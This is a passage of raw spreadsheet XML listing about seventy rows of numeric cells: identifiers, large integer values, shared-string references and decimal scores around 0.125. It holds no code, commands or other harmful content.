      <c r="A30228" s="1">
        <v>742.0</v>
      </c>
      <c r="B30228" s="2">
        <v>2.0874681E7</v>
      </c>
      <c r="C30228" s="2" t="s">
        <v>29060</v>
      </c>
      <c r="D30228" s="2">
        <v>1.0</v>
      </c>
      <c r="E30228" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30228" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30229" ht="15.75" customHeight="1">
      <c r="A30229" s="1">
        <v>904.0</v>
      </c>
      <c r="B30229" s="2">
        <v>2.2134681E7</v>
      </c>
      <c r="C30229" s="2" t="s">
        <v>29061</v>
      </c>
      <c r="D30229" s="2">
        <v>1.0</v>
      </c>
      <c r="E30229" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30229" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30230" ht="15.75" customHeight="1">
      <c r="A30230" s="1">
        <v>1003.0</v>
      </c>
      <c r="B30230" s="2">
        <v>2.3031149E7</v>
      </c>
      <c r="C30230" s="2" t="s">
        <v>29062</v>
      </c>
      <c r="D30230" s="2">
        <v>1.0</v>
      </c>
      <c r="E30230" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30230" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30231" ht="15.75" customHeight="1">
      <c r="A30231" s="1">
        <v>4124.0</v>
      </c>
      <c r="B30231" s="2">
        <v>4.1369026E7</v>
      </c>
      <c r="C30231" s="2" t="s">
        <v>29063</v>
      </c>
      <c r="D30231" s="2">
        <v>1.0</v>
      </c>
      <c r="E30231" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30231" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30232" ht="15.75" customHeight="1">
      <c r="A30232" s="1">
        <v>4989.0</v>
      </c>
      <c r="B30232" s="2">
        <v>4.4144382E7</v>
      </c>
      <c r="C30232" s="2" t="s">
        <v>29064</v>
      </c>
      <c r="D30232" s="2">
        <v>1.0</v>
      </c>
      <c r="E30232" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30232" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30233" ht="15.75" customHeight="1">
      <c r="A30233" s="1">
        <v>5757.0</v>
      </c>
      <c r="B30233" s="2">
        <v>4.6668226E7</v>
      </c>
      <c r="C30233" s="2" t="s">
        <v>29065</v>
      </c>
      <c r="D30233" s="2">
        <v>1.0</v>
      </c>
      <c r="E30233" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30233" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30234" ht="15.75" customHeight="1">
      <c r="A30234" s="1">
        <v>7978.0</v>
      </c>
      <c r="B30234" s="2">
        <v>5.2711703E7</v>
      </c>
      <c r="C30234" s="2" t="s">
        <v>29066</v>
      </c>
      <c r="D30234" s="2">
        <v>1.0</v>
      </c>
      <c r="E30234" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30234" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30235" ht="15.75" customHeight="1">
      <c r="A30235" s="1">
        <v>8320.0</v>
      </c>
      <c r="B30235" s="2">
        <v>5.3641868E7</v>
      </c>
      <c r="C30235" s="2" t="s">
        <v>29067</v>
      </c>
      <c r="D30235" s="2">
        <v>1.0</v>
      </c>
      <c r="E30235" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30235" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30236" ht="15.75" customHeight="1">
      <c r="A30236" s="1">
        <v>8665.0</v>
      </c>
      <c r="B30236" s="2">
        <v>5.435453E7</v>
      </c>
      <c r="C30236" s="2" t="s">
        <v>29068</v>
      </c>
      <c r="D30236" s="2">
        <v>1.0</v>
      </c>
      <c r="E30236" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30236" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30237" ht="15.75" customHeight="1">
      <c r="A30237" s="1">
        <v>9761.0</v>
      </c>
      <c r="B30237" s="2">
        <v>5.649429E7</v>
      </c>
      <c r="C30237" s="2" t="s">
        <v>29069</v>
      </c>
      <c r="D30237" s="2">
        <v>1.0</v>
      </c>
      <c r="E30237" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30237" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30238" ht="15.75" customHeight="1">
      <c r="A30238" s="1">
        <v>10077.0</v>
      </c>
      <c r="B30238" s="2">
        <v>5.7148162E7</v>
      </c>
      <c r="C30238" s="2" t="s">
        <v>29070</v>
      </c>
      <c r="D30238" s="2">
        <v>1.0</v>
      </c>
      <c r="E30238" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30238" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30239" ht="15.75" customHeight="1">
      <c r="A30239" s="1">
        <v>10902.0</v>
      </c>
      <c r="B30239" s="2">
        <v>1.6632911E7</v>
      </c>
      <c r="C30239" s="2" t="s">
        <v>29071</v>
      </c>
      <c r="D30239" s="2">
        <v>1.0</v>
      </c>
      <c r="E30239" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30239" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30240" ht="15.75" customHeight="1">
      <c r="A30240" s="1">
        <v>11013.0</v>
      </c>
      <c r="B30240" s="2">
        <v>1.7761876E7</v>
      </c>
      <c r="C30240" s="2" t="s">
        <v>29072</v>
      </c>
      <c r="D30240" s="2">
        <v>1.0</v>
      </c>
      <c r="E30240" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30240" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30241" ht="15.75" customHeight="1">
      <c r="A30241" s="1">
        <v>11098.0</v>
      </c>
      <c r="B30241" s="2">
        <v>1.8538934E7</v>
      </c>
      <c r="C30241" s="2" t="s">
        <v>29073</v>
      </c>
      <c r="D30241" s="2">
        <v>1.0</v>
      </c>
      <c r="E30241" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30241" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30242" ht="15.75" customHeight="1">
      <c r="A30242" s="1">
        <v>11118.0</v>
      </c>
      <c r="B30242" s="2">
        <v>1.8934943E7</v>
      </c>
      <c r="C30242" s="2" t="s">
        <v>29074</v>
      </c>
      <c r="D30242" s="2">
        <v>1.0</v>
      </c>
      <c r="E30242" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30242" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30243" ht="15.75" customHeight="1">
      <c r="A30243" s="1">
        <v>11517.0</v>
      </c>
      <c r="B30243" s="2">
        <v>2.2313844E7</v>
      </c>
      <c r="C30243" s="2" t="s">
        <v>29075</v>
      </c>
      <c r="D30243" s="2">
        <v>1.0</v>
      </c>
      <c r="E30243" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30243" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30244" ht="15.75" customHeight="1">
      <c r="A30244" s="1">
        <v>12225.0</v>
      </c>
      <c r="B30244" s="2">
        <v>2.7775959E7</v>
      </c>
      <c r="C30244" s="2" t="s">
        <v>29076</v>
      </c>
      <c r="D30244" s="2">
        <v>1.0</v>
      </c>
      <c r="E30244" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30244" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30245" ht="15.75" customHeight="1">
      <c r="A30245" s="1">
        <v>12391.0</v>
      </c>
      <c r="B30245" s="2">
        <v>2.8889874E7</v>
      </c>
      <c r="C30245" s="2" t="s">
        <v>29077</v>
      </c>
      <c r="D30245" s="2">
        <v>1.0</v>
      </c>
      <c r="E30245" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30245" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30246" ht="15.75" customHeight="1">
      <c r="A30246" s="1">
        <v>12464.0</v>
      </c>
      <c r="B30246" s="2">
        <v>2.9403838E7</v>
      </c>
      <c r="C30246" s="2" t="s">
        <v>29078</v>
      </c>
      <c r="D30246" s="2">
        <v>1.0</v>
      </c>
      <c r="E30246" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30246" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30247" ht="15.75" customHeight="1">
      <c r="A30247" s="1">
        <v>12550.0</v>
      </c>
      <c r="B30247" s="2">
        <v>2.9869406E7</v>
      </c>
      <c r="C30247" s="2" t="s">
        <v>29079</v>
      </c>
      <c r="D30247" s="2">
        <v>1.0</v>
      </c>
      <c r="E30247" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30247" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30248" ht="15.75" customHeight="1">
      <c r="A30248" s="1">
        <v>12773.0</v>
      </c>
      <c r="B30248" s="2">
        <v>3.1260625E7</v>
      </c>
      <c r="C30248" s="2" t="s">
        <v>29080</v>
      </c>
      <c r="D30248" s="2">
        <v>1.0</v>
      </c>
      <c r="E30248" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30248" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30249" ht="15.75" customHeight="1">
      <c r="A30249" s="1">
        <v>13424.0</v>
      </c>
      <c r="B30249" s="2">
        <v>3.5081947E7</v>
      </c>
      <c r="C30249" s="2" t="s">
        <v>29081</v>
      </c>
      <c r="D30249" s="2">
        <v>1.0</v>
      </c>
      <c r="E30249" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30249" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30250" ht="15.75" customHeight="1">
      <c r="A30250" s="1">
        <v>13425.0</v>
      </c>
      <c r="B30250" s="2">
        <v>3.5082561E7</v>
      </c>
      <c r="C30250" s="2" t="s">
        <v>29082</v>
      </c>
      <c r="D30250" s="2">
        <v>1.0</v>
      </c>
      <c r="E30250" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30250" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30251" ht="15.75" customHeight="1">
      <c r="A30251" s="1">
        <v>14988.0</v>
      </c>
      <c r="B30251" s="2">
        <v>4.1416145E7</v>
      </c>
      <c r="C30251" s="2" t="s">
        <v>29083</v>
      </c>
      <c r="D30251" s="2">
        <v>1.0</v>
      </c>
      <c r="E30251" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30251" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30252" ht="15.75" customHeight="1">
      <c r="A30252" s="1">
        <v>15078.0</v>
      </c>
      <c r="B30252" s="2">
        <v>4.1736739E7</v>
      </c>
      <c r="C30252" s="2" t="s">
        <v>29084</v>
      </c>
      <c r="D30252" s="2">
        <v>1.0</v>
      </c>
      <c r="E30252" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30252" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30253" ht="15.75" customHeight="1">
      <c r="A30253" s="1">
        <v>15584.0</v>
      </c>
      <c r="B30253" s="2">
        <v>4.3442267E7</v>
      </c>
      <c r="C30253" s="2" t="s">
        <v>29085</v>
      </c>
      <c r="D30253" s="2">
        <v>1.0</v>
      </c>
      <c r="E30253" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30253" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30254" ht="15.75" customHeight="1">
      <c r="A30254" s="1">
        <v>17143.0</v>
      </c>
      <c r="B30254" s="2">
        <v>4.8839943E7</v>
      </c>
      <c r="C30254" s="2" t="s">
        <v>29086</v>
      </c>
      <c r="D30254" s="2">
        <v>1.0</v>
      </c>
      <c r="E30254" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30254" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30255" ht="15.75" customHeight="1">
      <c r="A30255" s="1">
        <v>18391.0</v>
      </c>
      <c r="B30255" s="2">
        <v>5.2605848E7</v>
      </c>
      <c r="C30255" s="2" t="s">
        <v>29087</v>
      </c>
      <c r="D30255" s="2">
        <v>1.0</v>
      </c>
      <c r="E30255" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30255" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30256" ht="15.75" customHeight="1">
      <c r="A30256" s="1">
        <v>18494.0</v>
      </c>
      <c r="B30256" s="2">
        <v>5.2913854E7</v>
      </c>
      <c r="C30256" s="2" t="s">
        <v>29088</v>
      </c>
      <c r="D30256" s="2">
        <v>1.0</v>
      </c>
      <c r="E30256" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30256" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30257" ht="15.75" customHeight="1">
      <c r="A30257" s="1">
        <v>19090.0</v>
      </c>
      <c r="B30257" s="2">
        <v>5.4662457E7</v>
      </c>
      <c r="C30257" s="2" t="s">
        <v>29089</v>
      </c>
      <c r="D30257" s="2">
        <v>1.0</v>
      </c>
      <c r="E30257" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30257" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30258" ht="15.75" customHeight="1">
      <c r="A30258" s="1">
        <v>19716.0</v>
      </c>
      <c r="B30258" s="2">
        <v>5.6566732E7</v>
      </c>
      <c r="C30258" s="2" t="s">
        <v>29090</v>
      </c>
      <c r="D30258" s="2">
        <v>1.0</v>
      </c>
      <c r="E30258" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30258" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30259" ht="15.75" customHeight="1">
      <c r="A30259" s="1">
        <v>20545.0</v>
      </c>
      <c r="B30259" s="2">
        <v>1.3379737E7</v>
      </c>
      <c r="C30259" s="2" t="s">
        <v>29091</v>
      </c>
      <c r="D30259" s="2">
        <v>1.0</v>
      </c>
      <c r="E30259" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30259" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30260" ht="15.75" customHeight="1">
      <c r="A30260" s="1">
        <v>21080.0</v>
      </c>
      <c r="B30260" s="2">
        <v>1.8012754E7</v>
      </c>
      <c r="C30260" s="2" t="s">
        <v>29092</v>
      </c>
      <c r="D30260" s="2">
        <v>1.0</v>
      </c>
      <c r="E30260" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30260" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30261" ht="15.75" customHeight="1">
      <c r="A30261" s="1">
        <v>21719.0</v>
      </c>
      <c r="B30261" s="2">
        <v>2.5527422E7</v>
      </c>
      <c r="C30261" s="2" t="s">
        <v>29093</v>
      </c>
      <c r="D30261" s="2">
        <v>1.0</v>
      </c>
      <c r="E30261" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30261" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30262" ht="15.75" customHeight="1">
      <c r="A30262" s="1">
        <v>22222.0</v>
      </c>
      <c r="B30262" s="2">
        <v>3.2304522E7</v>
      </c>
      <c r="C30262" s="2" t="s">
        <v>29094</v>
      </c>
      <c r="D30262" s="2">
        <v>1.0</v>
      </c>
      <c r="E30262" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30262" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30263" ht="15.75" customHeight="1">
      <c r="A30263" s="1">
        <v>22510.0</v>
      </c>
      <c r="B30263" s="2">
        <v>3.7432853E7</v>
      </c>
      <c r="C30263" s="2" t="s">
        <v>29095</v>
      </c>
      <c r="D30263" s="2">
        <v>1.0</v>
      </c>
      <c r="E30263" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30263" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30264" ht="15.75" customHeight="1">
      <c r="A30264" s="1">
        <v>23243.0</v>
      </c>
      <c r="B30264" s="2">
        <v>5.3029447E7</v>
      </c>
      <c r="C30264" s="2" t="s">
        <v>29096</v>
      </c>
      <c r="D30264" s="2">
        <v>1.0</v>
      </c>
      <c r="E30264" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30264" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30265" ht="15.75" customHeight="1">
      <c r="A30265" s="1">
        <v>24193.0</v>
      </c>
      <c r="B30265" s="2">
        <v>1.0285305E7</v>
      </c>
      <c r="C30265" s="2" t="s">
        <v>29097</v>
      </c>
      <c r="D30265" s="2">
        <v>1.0</v>
      </c>
      <c r="E30265" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30265" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30266" ht="15.75" customHeight="1">
      <c r="A30266" s="1">
        <v>24469.0</v>
      </c>
      <c r="B30266" s="2">
        <v>1.0978962E7</v>
      </c>
      <c r="C30266" s="2" t="s">
        <v>29098</v>
      </c>
      <c r="D30266" s="2">
        <v>1.0</v>
      </c>
      <c r="E30266" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30266" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30267" ht="15.75" customHeight="1">
      <c r="A30267" s="1">
        <v>24757.0</v>
      </c>
      <c r="B30267" s="2">
        <v>1.1816895E7</v>
      </c>
      <c r="C30267" s="2" t="s">
        <v>29099</v>
      </c>
      <c r="D30267" s="2">
        <v>1.0</v>
      </c>
      <c r="E30267" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30267" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30268" ht="15.75" customHeight="1">
      <c r="A30268" s="1">
        <v>26111.0</v>
      </c>
      <c r="B30268" s="2">
        <v>1.5818311E7</v>
      </c>
      <c r="C30268" s="2" t="s">
        <v>29100</v>
      </c>
      <c r="D30268" s="2">
        <v>1.0</v>
      </c>
      <c r="E30268" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30268" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30269" ht="15.75" customHeight="1">
      <c r="A30269" s="1">
        <v>27482.0</v>
      </c>
      <c r="B30269" s="2">
        <v>2.2019427E7</v>
      </c>
      <c r="C30269" s="2" t="s">
        <v>29101</v>
      </c>
      <c r="D30269" s="2">
        <v>1.0</v>
      </c>
      <c r="E30269" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30269" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30270" ht="15.75" customHeight="1">
      <c r="A30270" s="1">
        <v>27890.0</v>
      </c>
      <c r="B30270" s="2">
        <v>2.3601308E7</v>
      </c>
      <c r="C30270" s="2" t="s">
        <v>29102</v>
      </c>
      <c r="D30270" s="2">
        <v>1.0</v>
      </c>
      <c r="E30270" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30270" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30271" ht="15.75" customHeight="1">
      <c r="A30271" s="1">
        <v>28192.0</v>
      </c>
      <c r="B30271" s="2">
        <v>2.500689E7</v>
      </c>
      <c r="C30271" s="2" t="s">
        <v>29103</v>
      </c>
      <c r="D30271" s="2">
        <v>1.0</v>
      </c>
      <c r="E30271" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30271" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30272" ht="15.75" customHeight="1">
      <c r="A30272" s="1">
        <v>28367.0</v>
      </c>
      <c r="B30272" s="2">
        <v>2.6035685E7</v>
      </c>
      <c r="C30272" s="2" t="s">
        <v>29104</v>
      </c>
      <c r="D30272" s="2">
        <v>1.0</v>
      </c>
      <c r="E30272" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30272" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30273" ht="15.75" customHeight="1">
      <c r="A30273" s="1">
        <v>28782.0</v>
      </c>
      <c r="B30273" s="2">
        <v>2.844023E7</v>
      </c>
      <c r="C30273" s="2" t="s">
        <v>29105</v>
      </c>
      <c r="D30273" s="2">
        <v>1.0</v>
      </c>
      <c r="E30273" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30273" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30274" ht="15.75" customHeight="1">
      <c r="A30274" s="1">
        <v>28939.0</v>
      </c>
      <c r="B30274" s="2">
        <v>2.9641281E7</v>
      </c>
      <c r="C30274" s="2" t="s">
        <v>29106</v>
      </c>
      <c r="D30274" s="2">
        <v>1.0</v>
      </c>
      <c r="E30274" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30274" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30275" ht="15.75" customHeight="1">
      <c r="A30275" s="1">
        <v>30170.0</v>
      </c>
      <c r="B30275" s="2">
        <v>3.7113791E7</v>
      </c>
      <c r="C30275" s="2" t="s">
        <v>29107</v>
      </c>
      <c r="D30275" s="2">
        <v>1.0</v>
      </c>
      <c r="E30275" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30275" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30276" ht="15.75" customHeight="1">
      <c r="A30276" s="1">
        <v>30231.0</v>
      </c>
      <c r="B30276" s="2">
        <v>3.7432852E7</v>
      </c>
      <c r="C30276" s="2" t="s">
        <v>29095</v>
      </c>
      <c r="D30276" s="2">
        <v>1.0</v>
      </c>
      <c r="E30276" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30276" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30277" ht="15.75" customHeight="1">
      <c r="A30277" s="1">
        <v>30388.0</v>
      </c>
      <c r="B30277" s="2">
        <v>3.8569441E7</v>
      </c>
      <c r="C30277" s="2" t="s">
        <v>29108</v>
      </c>
      <c r="D30277" s="2">
        <v>1.0</v>
      </c>
      <c r="E30277" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30277" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30278" ht="15.75" customHeight="1">
      <c r="A30278" s="1">
        <v>32800.0</v>
      </c>
      <c r="B30278" s="2">
        <v>6151179.0</v>
      </c>
      <c r="C30278" s="2" t="s">
        <v>29109</v>
      </c>
      <c r="D30278" s="2">
        <v>1.0</v>
      </c>
      <c r="E30278" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30278" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30279" ht="15.75" customHeight="1">
      <c r="A30279" s="1">
        <v>33178.0</v>
      </c>
      <c r="B30279" s="2">
        <v>7103536.0</v>
      </c>
      <c r="C30279" s="2" t="s">
        <v>29110</v>
      </c>
      <c r="D30279" s="2">
        <v>1.0</v>
      </c>
      <c r="E30279" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30279" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30280" ht="15.75" customHeight="1">
      <c r="A30280" s="1">
        <v>34265.0</v>
      </c>
      <c r="B30280" s="2">
        <v>8051161.0</v>
      </c>
      <c r="C30280" s="2" t="s">
        <v>29111</v>
      </c>
      <c r="D30280" s="2">
        <v>1.0</v>
      </c>
      <c r="E30280" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30280" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30281" ht="15.75" customHeight="1">
      <c r="A30281" s="1">
        <v>14993.0</v>
      </c>
      <c r="B30281" s="2">
        <v>4.1427302E7</v>
      </c>
      <c r="C30281" s="2" t="s">
        <v>29112</v>
      </c>
      <c r="D30281" s="2">
        <v>1.0</v>
      </c>
      <c r="E30281" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30281" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="30282" ht="15.75" customHeight="1">
      <c r="A30282" s="1">
        <v>20164.0</v>
      </c>
      <c r="B30282" s="2">
        <v>1.0382621E7</v>
      </c>
      <c r="C30282" s="2" t="s">
        <v>29113</v>
      </c>
      <c r="D30282" s="2">
        <v>1.0</v>
      </c>
      <c r="E30282" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30282" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="30283" ht="15.75" customHeight="1">
      <c r="A30283" s="1">
        <v>21307.0</v>
      </c>
      <c r="B30283" s="2">
        <v>2.0766862E7</v>
      </c>
      <c r="C30283" s="2" t="s">
        <v>29114</v>
      </c>
      <c r="D30283" s="2">
        <v>1.0</v>
      </c>
      <c r="E30283" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30283" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="30284" ht="15.75" customHeight="1">
      <c r="A30284" s="1">
        <v>12095.0</v>
      </c>
      <c r="B30284" s="2">
        <v>2.6735492E7</v>
      </c>
      <c r="C30284" s="2" t="s">
        <v>29115</v>
      </c>
      <c r="D30284" s="2">
        <v>1.0</v>
      </c>
      <c r="E30284" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30284" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="30285" ht="15.75" customHeight="1">
      <c r="A30285" s="1">
        <v>18087.0</v>
      </c>
      <c r="B30285" s="2">
        <v>5.1662312E7</v>
      </c>
      <c r="C30285" s="2" t="s">
        <v>29116</v>
      </c>
      <c r="D30285" s="2">
        <v>1.0</v>
      </c>
      <c r="E30285" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30285" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="30286" ht="15.75" customHeight="1">
      <c r="A30286" s="1">
        <v>33123.0</v>
      </c>
      <c r="B30286" s="2">
        <v>7000890.0</v>
      </c>
      <c r="C30286" s="2" t="s">
        <v>29117</v>
      </c>
      <c r="D30286" s="2">
        <v>1.0</v>
      </c>
      <c r="E30286" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30286" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="30287" ht="15.75" customHeight="1">
      <c r="A30287" s="1">
        <v>21872.0</v>
      </c>
      <c r="B30287" s="2">
        <v>2.7549327E7</v>
      </c>
      <c r="C30287" s="2" t="s">
        <v>29118</v>
      </c>
      <c r="D30287" s="2">
        <v>1.0</v>
      </c>
      <c r="E30287" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30287" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="30288" ht="15.75" customHeight="1">
      <c r="A30288" s="1">
        <v>24642.0</v>
      </c>
      <c r="B30288" s="2">
        <v>1.1483414E7</v>
      </c>
      <c r="C30288" s="2" t="s">
        <v>29119</v>
      </c>
      <c r="D30288" s="2">
        <v>1.0</v>
      </c>
      <c r="E30288" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30288" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="30289" ht="15.75" customHeight="1">
      <c r="A30289" s="1">
        <v>27655.0</v>
      </c>
      <c r="B30289" s="2">
        <v>2.2840504E7</v>
      </c>
      <c r="C30289" s="2" t="s">
        <v>29120</v>
      </c>
      <c r="D30289" s="2">
        <v>1.0</v>
      </c>
      <c r="E30289" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30289" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="30290" ht="15.75" customHeight="1">
      <c r="A30290" s="1">
        <v>3633.0</v>
      </c>
      <c r="B30290" s="2">
        <v>3.9232652E7</v>
      </c>
      <c r="C30290" s="2" t="s">
        <v>29121</v>
      </c>
      <c r="D30290" s="2">
        <v>1.0</v>
      </c>
      <c r="E30290" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30290" s="2">
        <v>0.1252072968490879</v>
      </c>
    </row>
    <row r="30291" ht="15.75" customHeight="1">
      <c r="A30291" s="1">
        <v>16209.0</v>
      </c>
      <c r="B30291" s="2">
        <v>4.5691813E7</v>
      </c>
      <c r="C30291" s="2" t="s">
        <v>29122</v>
      </c>
      <c r="D30291" s="2">
        <v>1.0</v>
      </c>
      <c r="E30291" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30291" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="30292" ht="15.75" customHeight="1">
      <c r="A30292" s="1">
        <v>34216.0</v>
      </c>
      <c r="B30292" s="2">
        <v>3.3664175E7</v>
      </c>
      <c r="C30292" s="2" t="s">
        <v>29123</v>
      </c>
      <c r="D30292" s="2">
        <v>1.0</v>
      </c>
      <c r="E30292" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30292" s="2">
        <v>0.1246438746438747</v>
      </c>
    </row>
    <row r="30293" ht="15.75" customHeight="1">
      <c r="A30293" s="1">
        <v>31330.0</v>
      </c>
      <c r="B30293" s="2">
        <v>4.9746252E7</v>
      </c>
      <c r="C30293" s="2" t="s">
        <v>29124</v>
      </c>
      <c r="D30293" s="2">
        <v>1.0</v>
      </c>
      <c r="E30293" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30293" s="2">
        <v>0.1246031746031746</v>
      </c>
    </row>
    <row r="30294" ht="15.75" customHeight="1">
      <c r="A30294" s="1">
        <v>24713.0</v>
      </c>
      <c r="B30294" s="2">
        <v>1.1687344E7</v>
      </c>
      <c r="C30294" s="2" t="s">
        <v>29125</v>
      </c>
      <c r="D30294" s="2">
        <v>1.0</v>
      </c>
      <c r="E30294" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30294" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="30295" ht="15.75" customHeight="1">
